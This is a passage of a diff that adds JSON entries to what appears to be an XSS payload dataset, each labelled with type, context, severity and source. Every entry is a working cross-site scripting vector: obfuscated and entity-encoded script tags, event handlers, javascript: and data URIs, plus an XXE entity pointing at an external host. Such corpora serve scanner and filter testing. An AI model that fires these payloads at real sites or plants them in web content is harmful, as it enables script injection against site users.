"javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script ~~~>alert(0%0)</script ~~~>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "style", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(0701)", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "style", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<div/style=\"width:expression(confirm(1))\">X</div> {IE7}", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<iframe/%00/ src=javaSCRIPT&colon;alert(1411)", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "style", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a/href=\"javascript:&#13; javascript:prompt(2484)\"><input type=\"X\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "</plaintext\\></|\\><plaintext/onmouseover=prompt(4714)", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<iframe style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(0738)\">", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "style", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<embed src=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<object data=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<var onmouseover=\"prompt(0565)\">On Mouse Over</var>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src=\"/\" =_=\" title=\"onerror='prompt(6492)'\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<%<!--'%><script>alert(1804);</script -->", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script src=\"data:text/javascript,alert(9252)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<iframe/src \\/\\/onload = prompt(5682)", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<iframe/onreadystatechange=alert(9115)", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<svg/onload=alert(5553)", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<input type=\"text\" value=`` <div/onmouseover='alert(2702)'>X</div>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "http://www.<script>alert(1844)</script .com", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<svg><script ?>alert(8510)", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src=`xx:xx`onerror=alert(4153)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<meta http-equiv=\"refresh\" content=\"0;javascript&colon;alert(3787)\"/>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<embed code=\"http://businessinfo.co.uk/labs/xss/xss.swf\" allowscriptaccess=always>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/XSS/)></script", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script>+-+-1-+-+alert(4141)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body/onload=&lt;!--&gt;&#10alert(4397)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script itworksinallbrowsers>/*<script* */alert(3068)</script", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src ?itworksonchrome?\\/onerror = alert(0008)", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<svg><script onlypossibleinopera:-)> alert(6365)", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script x> alert(8948) </script 1=2", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<div/onmouseover='alert(8630)'> style=\"x:\">", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<--`<img/src=` onerror=alert(0276)> --!>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<div style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(9046)\" onclick=\"alert(9046)\">x</button>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "style", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<form><button formaction=javascript&colon;alert(1282)>CLICKME", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>", + "category": "xss", + "metadata": { + "type": "data_uri", + "context": "html", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<iframe src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"></iframe>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203\">Click Me</a>", + "category": "xss", + "metadata": { + "type": "data_uri", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<div id=\"28\">1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(28)&gt;>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"29\"><link rel=stylesheet href=data:,*%7bx:expression(alert(29))%7d//[\"'`-->]]>]</div><div id=\"30\"><style>@import \"data:,*%7bx:expression(alert(30))%7D\";</style>//[\"'`-->]]>]</div><div id=\"31\"><frameset onload=alert(31)>//[\"'`-->]]>]</div><div id=\"32\"><table background=\"javascript:alert(32)\"></table>//[\"'`-->]]>]</div><div id=\"33\"><a style=\"pointer-events:none;position:absolute;\"><a style=\"position:absolute;\" onclick=\"alert(33);\">XXX</a></a><a href=\"javascript:alert(2)\">XXX</a>//[\"'`-->]]>]</div><div id=\"34\">1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>//[\"'`-->]]>]</div><div id=\"35\">1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(35) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>//[\"'`-->]]>]</div><div id=\"36\"><a style=\"behavior:url(#default#AnchorClick);\" folder=\"javascript:alert(36)\">XXX</a>//[\"'`-->]]>]</div><div id=\"37\"><!--<img src=\"--><img src=x onerror=alert(37)//\">//[\"'`-->]]>]</div><div id=\"38\"><comment><img src=\"</comment><img src=x onerror=alert(38)//\">//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"39\"><!-- up to Opera 11.52, FF 3.6.28 -->", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<![><img src=\"]><img src=x onerror=alert(39)//\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ -->", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<svg><![CDATA[><image xlink:href=\"]]><img src=xx:x onerror=alert(2)//\"></svg>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"40\"><style><img src=\"</style><img src=x onerror=alert(40)//\">//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"41\"><li style=list-style:url() onerror=alert(41)></li>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "style", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(41)></div>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "style", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"42\"><head><base href=\"javascript://\"/></head><body><a href=\"/. /,alert(42)//#\">XXX</a></body>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"43\"><?xml version=\"1.0\" standalone=\"no\"?>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "event_attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<html xmlns=\"http://www.w3.org/1999/xhtml\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<head>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<style type=\"text/css\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "@font-face {font-family: y; src: url(\"font.svg#x\") format(\"svg\");} body {font: 100px \"y\";}", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</style>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</head>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<body>Hello</body>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</html>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"44\"><style>*[{}@import'test.css?]{color: green;}</style>X//[\"'`-->]]>]</div><div id=\"45\"><div style=\"font-family:'foo[a];color:red;';\">XXX</div>//[\"'`-->]]>]</div><div id=\"46\"><div style=\"font-family:foo}color=red;\">XXX</div>//[\"'`-->]]>]</div><div id=\"47\"><svg xmlns=\"http://www.w3.org/2000/svg\"><script>alert(47)</script></svg>//[\"'`-->]]>]</div><div id=\"48\"><SCRIPT FOR=document EVENT=onreadystatechange>alert(48)</SCRIPT>//[\"'`-->]]>]</div><div id=\"49\"><OBJECT CLASSID=\"clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\"><PARAM NAME=\"DataURL\" VALUE=\"javascript:alert(49)\"></OBJECT>//[\"'`-->]]>]</div><div id=\"50\"><object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></object>//[\"'`-->]]>]</div><div id=\"51\"><embed src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></embed>//[\"'`-->]]>]</div><div id=\"52\"><x style=\"behavior:url(test.sct)\">//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"53\"><xml id=\"xss\" src=\"test.htc\"></xml>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<label dataformatas=\"html\" datasrc=\"#xss\" datafld=\"payload\"></label>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"54\"><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>//[\"'`-->]]>]</div><div id=\"55\"><video><source onerror=\"alert(55)\">//[\"'`-->]]>]</div><div id=\"56\"><video onerror=\"alert(56)\"><source></source></video>//[\"'`-->]]>]</div><div id=\"57\"><b <script>alert(57)//</script>0</script></b>//[\"'`-->]]>]</div><div id=\"58\"><b><script<b></b><alert(58)</script </b></b>//[\"'`-->]]>]</div><div id=\"59\"><div id=\"div1\"><input value=\"``onmouseover=alert(59)\"></div> <div id=\"div2\"></div><script>document.getElementById(\"div2\").innerHTML = document.getElementById(\"div1\").innerHTML;</script>//[\"'`-->]]>]</div><div id=\"60\"><div style=\"[a]color[b]:[c]red\">XXX</div>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"61\"><div style=\"\\63&#9\\06f&#10\\0006c&#12\\00006F&#13\\R:\\000072 Ed;color\\0\\bla:yellow\\0\\bla;col\\0\\00 \\&#xA0or:blue;\">XXX</div>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"62\"><!-- IE 6-8 -->", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<x '=\"foo\"><x foo='><img src=x onerror=alert(62)//'>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<!-- IE 6-9 -->", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<! '=\"foo\"><x foo='><img src=x onerror=alert(2)//'>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<? '=\"foo\"><x foo='><img src=x onerror=alert(3)//'>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"63\"><embed src=\"javascript:alert(63)\"></embed> // O10.10↓, OM10.0↓, GC6↓, FF", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<img src=\"javascript:alert(2)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<image src=\"javascript:alert(2)\"> // IE6, O10.10↓, OM10.0↓", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<script src=\"javascript:alert(3)\"></script> // IE6, O11.01↓, OM10.1↓//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"64\"><!DOCTYPE x[<!ENTITY x SYSTEM \"http://html5sec.org/test.xxe\">]><y>&x;</y>//[\"'`-->]]>]</div><div id=\"65\"><svg onload=\"javascript:alert(65)\" xmlns=\"http://www.w3.org/2000/svg\"></svg>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "href", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"66\"><?xml version=\"1.0\"?>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "event_attribute", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<?xml-stylesheet type=\"text/xsl\" href=\"data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(66)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E\"?>", + "category": "xss", + "metadata": { + "type": "data_uri", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<root/>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"67\"><!DOCTYPE x [", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<!ATTLIST img xmlns CDATA \"http://www.w3.org/1999/xhtml\" src CDATA \"xx:x\"", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "onerror CDATA \"alert(67)\"", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "html", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "onload CDATA \"alert(2)\">", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "html", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "]><img />//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"68\"><doc xmlns:xlink=\"http://www.w3.org/1999/xlink\" xmlns:html=\"http://www.w3.org/1999/xhtml\">", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<html:style /><x xlink:href=\"javascript:alert(68)\" xlink:type=\"simple\">XXX</x>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</doc>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"69\"><card xmlns=\"http://www.wapforum.org/2001/wml\"><onevent type=\"ontimer\"><go href=\"javascript:alert(69)\"/></onevent><timer value=\"1\"/></card>//[\"'`-->]]>]</div><div id=\"70\"><div style=width:1px;filter:glow onfilterchange=alert(70)>x</div>//[\"'`-->]]>]</div><div id=\"71\"><// style=x:expression\\28alert(71)\\29>//[\"'`-->]]>]</div><div id=\"72\"><form><button formaction=\"javascript:alert(72)\">X</button>//[\"'`-->]]>]</div><div id=\"73\"><event-source src=\"event.php\" onload=\"alert(73)\">//[\"'`-->]]>]</div><div id=\"74\"><a href=\"javascript:alert(74)\"><event-source src=\"data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A\" /></a>//[\"'`-->]]>]</div><div id=\"75\"><script<{alert(75)}/></script </>//[\"'`-->]]>]</div><div id=\"76\"><?xml-stylesheet type=\"text/css\"?><!DOCTYPE x SYSTEM \"test.dtd\"><x>&x;</x>//[\"'`-->]]>]</div><div id=\"77\"><?xml-stylesheet type=\"text/css\"?><root style=\"x:expression(alert(77))\"/>//[\"'`-->]]>]</div><div id=\"78\"><?xml-stylesheet type=\"text/xsl\" href=\"#\"?><img xmlns=\"x-schema:test.xdr\"/>//[\"'`-->]]>]</div><div id=\"79\"><object allowscriptaccess=\"always\" data=\"test.swf\"></object>//[\"'`-->]]>]</div><div id=\"80\"><style>*{x:expression(alert(80))}</style>//[\"'`-->]]>]</div><div id=\"81\"><x xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:actuate=\"onLoad\" xlink:href=\"javascript:alert(81)\" xlink:type=\"simple\"/>//[\"'`-->]]>]</div><div id=\"82\"><?xml-stylesheet type=\"text/css\" href=\"data:,*%7bx:expression(write(2));%7d\"?>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"83\"><x:template xmlns:x=\"http://www.wapforum.org/2001/wml\" x:ontimer=\"$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(83)\"><x:timer value=\"1\"/></x:template>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "event_attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"84\"><x xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\" ev:handler=\"javascript:alert(84)//#x\"/>//[\"'`-->]]>]</div><div id=\"85\"><x xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\" ev:handler=\"test.evt#x\"/>//[\"'`-->]]>]</div><div id=\"86\"><body oninput=alert(86)><input autofocus>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"87\"><svg xmlns=\"http://www.w3.org/2000/svg\">", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<a xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:href=\"javascript:alert(87)\"><rect width=\"1000\" height=\"1000\" fill=\"white\"/></a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "MarioXSSVectors" + } + }, + { + "payload": "</svg>//[\"'`-->]]>]</div>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<div id=\"88\"><svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "html", + "severity": "medium", + "source": "MarioXSSVectors" + } + }, + { + "payload": "<animation xlink:href=\"javascript:alert(88)\"/>", + "category": "xss", + "metadata": { + 